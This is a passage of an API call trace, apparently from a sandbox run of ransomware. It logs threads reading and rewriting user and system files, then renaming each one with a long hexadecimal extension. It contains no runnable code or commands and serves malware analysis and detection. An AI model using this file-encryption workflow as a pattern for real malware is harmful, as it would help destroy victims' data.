lpNumberOfBytesRead=0x0, lpOverlapped=0x78492b8) returned 1 [0170.806] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0170.806] ReadFile (in: hFile=0x5f0, lpBuffer=0x7891548, nNumberOfBytesToRead=0x1c00, lpNumberOfBytesRead=0x0, lpOverlapped=0x7871410 | out: lpBuffer=0x7891548*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7871410) returned 1 [0170.807] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0170.807] WriteFile (in: hFile=0x598, lpBuffer=0x75526e0*, nNumberOfBytesToWrite=0x1200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75325a8 | out: lpBuffer=0x75526e0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75325a8) returned 1 [0170.808] RtlInterlockedCompareExchange64 () returned 0x0 [0170.808] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0170.808] WriteFile (in: hFile=0x5d8, lpBuffer=0x757a838*, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x755a700 | out: lpBuffer=0x757a838*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x755a700) returned 1 [0170.810] RtlInterlockedCompareExchange64 () returned 0x1 [0170.810] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) 
returned 1 [0170.810] WriteFile (in: hFile=0x5b4, lpBuffer=0x7841298*, nNumberOfBytesToWrite=0x1200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7821160 | out: lpBuffer=0x7841298*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7821160) returned 1 [0170.811] RtlInterlockedCompareExchange64 () returned 0x2 [0170.811] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0170.811] WriteFile (in: hFile=0x5f4, lpBuffer=0x78693f0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x0, lpOverlapped=0x78492b8 | out: lpBuffer=0x78693f0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x78492b8) returned 1 [0170.817] RtlInterlockedCompareExchange64 () returned 0x3 [0170.817] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0170.817] WriteFile (in: hFile=0x5f0, lpBuffer=0x7891548*, nNumberOfBytesToWrite=0x1c00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7871410 | out: lpBuffer=0x7891548*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7871410) returned 1 [0170.819] RtlInterlockedCompareExchange64 () returned 0x4 [0170.819] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0170.819] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x7532658, ObjectInformationLength=0x10004, ReturnLength=0x714f8ac | out: ObjectInformation=0x7532658, ReturnLength=0x714f8ac) returned 0x0 [0170.820] lstrcatW (in: 
lpString1="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg", lpString2=".FD602CC33AAA29385CF14BF7BB76002FBB77B90E0A3B665AF2F33FCB6A71DE02" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg.FD602CC33AAA29385CF14BF7BB76002FBB77B90E0A3B665AF2F33FCB6A71DE02") returned="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg.FD602CC33AAA29385CF14BF7BB76002FBB77B90E0A3B665AF2F33FCB6A71DE02" [0170.820] GetProcessHeap () returned 0x270000 [0170.820] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x156) returned 0x35bce0 [0170.820] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x714f89c, FileInformation=0x35bce0, Length=0x156, FileInformationClass=0xa) returned 0x0 [0170.822] CloseHandle (hObject=0x598) returned 1 [0170.823] GetProcessHeap () returned 0x270000 [0170.824] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75325a8 | out: hHeap=0x270000) returned 1 [0170.824] RtlInterlockedCompareExchange64 () returned 0x5 [0170.825] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0170.825] NtQueryObject (in: Handle=0x5d8, ObjectInformationClass=0x1, ObjectInformation=0x755a7b0, ObjectInformationLength=0x10004, ReturnLength=0x714f8ac | out: ObjectInformation=0x755a7b0, ReturnLength=0x714f8ac) returned 0x0 [0170.826] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg", lpString2=".A05043C5AFF17064AE97B0BF57D6B64605EA89CAD55DE4BC98D6ACA0F647666E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows 
Mail\\Stationery\\Roses.jpg.A05043C5AFF17064AE97B0BF57D6B64605EA89CAD55DE4BC98D6ACA0F647666E") returned="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg.A05043C5AFF17064AE97B0BF57D6B64605EA89CAD55DE4BC98D6ACA0F647666E" [0170.826] GetProcessHeap () returned 0x270000 [0170.826] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x152) returned 0x35be48 [0170.826] NtSetInformationFile (FileHandle=0x5d8, IoStatusBlock=0x714f89c, FileInformation=0x35be48, Length=0x152, FileInformationClass=0xa) returned 0x0 [0170.857] CloseHandle (hObject=0x5d8) returned 1 [0170.858] GetProcessHeap () returned 0x270000 [0170.860] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x755a700 | out: hHeap=0x270000) returned 1 [0170.863] RtlInterlockedCompareExchange64 () returned 0x2 [0170.863] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0170.863] WriteFile (in: hFile=0x594, lpBuffer=0x77292e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x77091a8 | out: lpBuffer=0x77292e0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x77091a8) returned 1 [0170.864] RtlInterlockedCompareExchange64 () returned 0x1 [0170.864] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0170.865] WriteFile (in: hFile=0x604, lpBuffer=0x75ca140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75aa008 | out: lpBuffer=0x75ca140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75aa008) returned 1 [0170.867] RtlInterlockedCompareExchange64 () returned 0x2 [0170.867] 
GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0170.867] NtQueryObject (in: Handle=0x594, ObjectInformationClass=0x1, ObjectInformation=0x7709258, ObjectInformationLength=0x10004, ReturnLength=0x714f8ac | out: ObjectInformation=0x7709258, ReturnLength=0x714f8ac) returned 0x0 [0170.869] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg", lpString2=".C5F23B07B40FE2A8FB66A60280B7ABB5C2082B022BD1122123E5CFF30EDA527C" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg.C5F23B07B40FE2A8FB66A60280B7ABB5C2082B022BD1122123E5CFF30EDA527C") returned="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg.C5F23B07B40FE2A8FB66A60280B7ABB5C2082B022BD1122123E5CFF30EDA527C" [0170.869] GetProcessHeap () returned 0x270000 [0170.869] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x15c) returned 0x7733b50 [0170.869] NtSetInformationFile (FileHandle=0x594, IoStatusBlock=0x714f89c, FileInformation=0x7733b50, Length=0x15c, FileInformationClass=0xa) returned 0x0 [0170.871] CloseHandle (hObject=0x594) returned 1 [0170.872] GetProcessHeap () returned 0x270000 [0170.874] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x77091a8 | out: hHeap=0x270000) returned 1 [0170.874] RtlInterlockedCompareExchange64 () returned 0x3 [0170.875] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0170.875] NtQueryObject (in: Handle=0x604, 
ObjectInformationClass=0x1, ObjectInformation=0x75aa0b8, ObjectInformationLength=0x10004, ReturnLength=0x714f8ac | out: ObjectInformation=0x75aa0b8, ReturnLength=0x714f8ac) returned 0x0 [0170.876] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log", lpString2=".FF4718228547995DA88AA1217E3823A5F20748B66A29C3F896D0615197A40544" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log.FF4718228547995DA88AA1217E3823A5F20748B66A29C3F896D0615197A40544") returned="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log.FF4718228547995DA88AA1217E3823A5F20748B66A29C3F896D0615197A40544" [0170.876] GetProcessHeap () returned 0x270000 [0170.876] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x138) returned 0x7418ab8 [0170.876] NtSetInformationFile (FileHandle=0x604, IoStatusBlock=0x714f89c, FileInformation=0x7418ab8, Length=0x138, FileInformationClass=0xa) returned 0x0 [0170.882] CloseHandle (hObject=0x604) returned 1 [0170.883] GetProcessHeap () returned 0x270000 [0170.885] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75aa008 | out: hHeap=0x270000) returned 1 [0170.901] RtlInterlockedCompareExchange64 () returned 0x2 [0170.901] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0171.822] WriteFile (in: hFile=0x5b0, lpBuffer=0x76d9030*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x76b8ef8 | out: lpBuffer=0x76d9030*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x76b8ef8) returned 1 [0171.834] RtlInterlockedCompareExchange64 () returned 0x5 [0171.835] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, 
lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0172.030] NtQueryObject (in: Handle=0x594, ObjectInformationClass=0x1, ObjectInformation=0x7709258, ObjectInformationLength=0x10004, ReturnLength=0x714f8ac | out: ObjectInformation=0x7709258, ReturnLength=0x714f8ac) returned 0x0 [0172.031] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg", lpString2=".52AF33AB5EE535F6667D9EFC95C895992C59603A9F5DC5676D09B02C6E381F12" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg.52AF33AB5EE535F6667D9EFC95C895992C59603A9F5DC5676D09B02C6E381F12") returned="\\Device\\HarddiskVolume1\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg.52AF33AB5EE535F6667D9EFC95C895992C59603A9F5DC5676D09B02C6E381F12" [0172.031] GetProcessHeap () returned 0x270000 [0172.031] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x12c) returned 0x43337c0 [0172.032] NtSetInformationFile (FileHandle=0x594, IoStatusBlock=0x714f89c, FileInformation=0x43337c0, Length=0x12c, FileInformationClass=0xa) returned 0x0 [0172.142] CloseHandle (hObject=0x594) returned 1 [0172.142] GetProcessHeap () returned 0x270000 [0172.144] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x77091a8 | out: hHeap=0x270000) returned 1 [0172.144] RtlInterlockedCompareExchange64 () returned 0x2 [0172.144] GetQueuedCompletionStatus (CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff) Thread: id = 105 os_tid = 0xae8 [0142.348] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0156.308] ReadFile (in: 
hFile=0x5a8, lpBuffer=0x755a548, nNumberOfBytesToRead=0x2600, lpNumberOfBytesRead=0x0, lpOverlapped=0x753a410 | out: lpBuffer=0x755a548*, lpNumberOfBytesRead=0x0, lpOverlapped=0x753a410) returned 1 [0156.308] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0156.321] WriteFile (in: hFile=0x5a8, lpBuffer=0x755a548*, nNumberOfBytesToWrite=0x2600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x753a410 | out: lpBuffer=0x755a548*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x753a410) returned 1 [0156.322] RtlInterlockedCompareExchange64 () returned 0x3 [0156.322] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0156.375] NtQueryObject (in: Handle=0x5a8, ObjectInformationClass=0x1, ObjectInformation=0x753a4c0, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x753a4c0, ReturnLength=0x6fef7f4) returned 0x0 [0156.386] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmuxmui.msi.16.en-us.xml", lpString2=".4F8FE545ECB94E3A3FCB02BCC440DAE73AB0FF16CAC3B7AFD3E1FF888348E927" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmuxmui.msi.16.en-us.xml.4F8FE545ECB94E3A3FCB02BCC440DAE73AB0FF16CAC3B7AFD3E1FF888348E927") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmuxmui.msi.16.en-us.xml.4F8FE545ECB94E3A3FCB02BCC440DAE73AB0FF16CAC3B7AFD3E1FF888348E927" 
[0156.386] GetProcessHeap () returned 0x270000 [0156.386] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x19e) returned 0x4246768 [0156.386] NtSetInformationFile (FileHandle=0x5a8, IoStatusBlock=0x6fef7e4, FileInformation=0x4246768, Length=0x19e, FileInformationClass=0xa) returned 0x0 [0156.388] CloseHandle (hObject=0x5a8) returned 1 [0156.392] GetProcessHeap () returned 0x270000 [0156.394] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x753a410 | out: hHeap=0x270000) returned 1 [0156.394] RtlInterlockedCompareExchange64 () returned 0x2 [0156.394] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0156.486] ReadFile (in: hFile=0x5a8, lpBuffer=0x74421a0, nNumberOfBytesToRead=0x5e00, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068) returned 1 [0156.489] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0159.453] WriteFile (in: hFile=0x590, lpBuffer=0x74421a0*, nNumberOfBytesToWrite=0x2e00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068) returned 1 [0159.454] RtlInterlockedCompareExchange64 () returned 0x1 [0159.454] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0160.060] NtQueryObject (in: Handle=0x5a8, ObjectInformationClass=0x1, 
ObjectInformation=0x7422118, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x7422118, ReturnLength=0x6fef7f4) returned 0x0 [0160.061] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\AutoPlayLogo.png", lpString2=".A648CFE99EE6113C3F94A341F45D025E249CD731C319E3EDA77F44CC2451E535" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\AutoPlayLogo.png.A648CFE99EE6113C3F94A341F45D025E249CD731C319E3EDA77F44CC2451E535") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\AutoPlayLogo.png.A648CFE99EE6113C3F94A341F45D025E249CD731C319E3EDA77F44CC2451E535" [0160.061] GetProcessHeap () returned 0x270000 [0160.061] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x166) returned 0x74201f8 [0160.061] NtSetInformationFile (FileHandle=0x5a8, IoStatusBlock=0x6fef7e4, FileInformation=0x74201f8, Length=0x166, FileInformationClass=0xa) returned 0x0 [0160.247] CloseHandle (hObject=0x5a8) returned 1 [0160.250] GetProcessHeap () returned 0x270000 [0160.252] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7422068 | out: hHeap=0x270000) returned 1 [0160.255] RtlInterlockedCompareExchange64 () returned 0x1 [0160.255] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0160.331] ReadFile (in: hFile=0x5a8, lpBuffer=0x7400180, nNumberOfBytesToRead=0x1600, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048) returned 1 [0160.336] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, 
dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0160.467] WriteFile (in: hFile=0x5a8, lpBuffer=0x7400180*, nNumberOfBytesToWrite=0x7000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048) returned 1 [0160.474] RtlInterlockedCompareExchange64 () returned 0x0 [0160.474] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0160.500] ReadFile (in: hFile=0x5b4, lpBuffer=0x7492450, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7472318 | out: lpBuffer=0x7492450*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7472318) returned 1 [0160.500] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0160.586] WriteFile (in: hFile=0x5b0, lpBuffer=0x752a2a8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x750a170 | out: lpBuffer=0x752a2a8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x750a170) returned 1 [0160.792] RtlInterlockedCompareExchange64 () returned 0x3 [0160.792] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0163.959] ReadFile (in: hFile=0x590, lpBuffer=0x757a558, nNumberOfBytesToRead=0x600, lpNumberOfBytesRead=0x0, lpOverlapped=0x755a420 | out: lpBuffer=0x757a558*, lpNumberOfBytesRead=0x0, 
lpOverlapped=0x755a420) returned 1 [0163.959] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0163.963] WriteFile (in: hFile=0x590, lpBuffer=0x757a558*, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x755a420 | out: lpBuffer=0x757a558*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x755a420) returned 1 [0163.967] RtlInterlockedCompareExchange64 () returned 0x2 [0163.967] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0163.989] NtQueryObject (in: Handle=0x590, ObjectInformationClass=0x1, ObjectInformation=0x755a4d0, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x755a4d0, ReturnLength=0x6fef7f4) returned 0x0 [0163.990] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg", lpString2=".49DAA0B1F5CC0C97DE54D646104224F4ADC74DE853744FAC5AEFDF305DCA2E6E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg.49DAA0B1F5CC0C97DE54D646104224F4ADC74DE853744FAC5AEFDF305DCA2E6E") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg.49DAA0B1F5CC0C97DE54D646104224F4ADC74DE853744FAC5AEFDF305DCA2E6E" [0163.990] GetProcessHeap () returned 0x270000 [0163.990] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x158) returned 0x35b5d8 [0163.990] NtSetInformationFile (FileHandle=0x590, IoStatusBlock=0x6fef7e4, FileInformation=0x35b5d8, Length=0x158, 
FileInformationClass=0xa) returned 0x0 [0163.996] CloseHandle (hObject=0x590) returned 1 [0163.999] GetProcessHeap () returned 0x270000 [0164.001] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x755a420 | out: hHeap=0x270000) returned 1 [0164.011] RtlInterlockedCompareExchange64 () returned 0x1 [0164.011] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0164.405] ReadFile (in: hFile=0x4a8, lpBuffer=0x7400180, nNumberOfBytesToRead=0x7600, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048) returned 1 [0164.405] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0164.406] NtQueryObject (in: Handle=0x5bc, ObjectInformationClass=0x1, ObjectInformation=0x7582628, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x7582628, ReturnLength=0x6fef7f4) returned 0x0 [0164.407] lstrcatW (in: 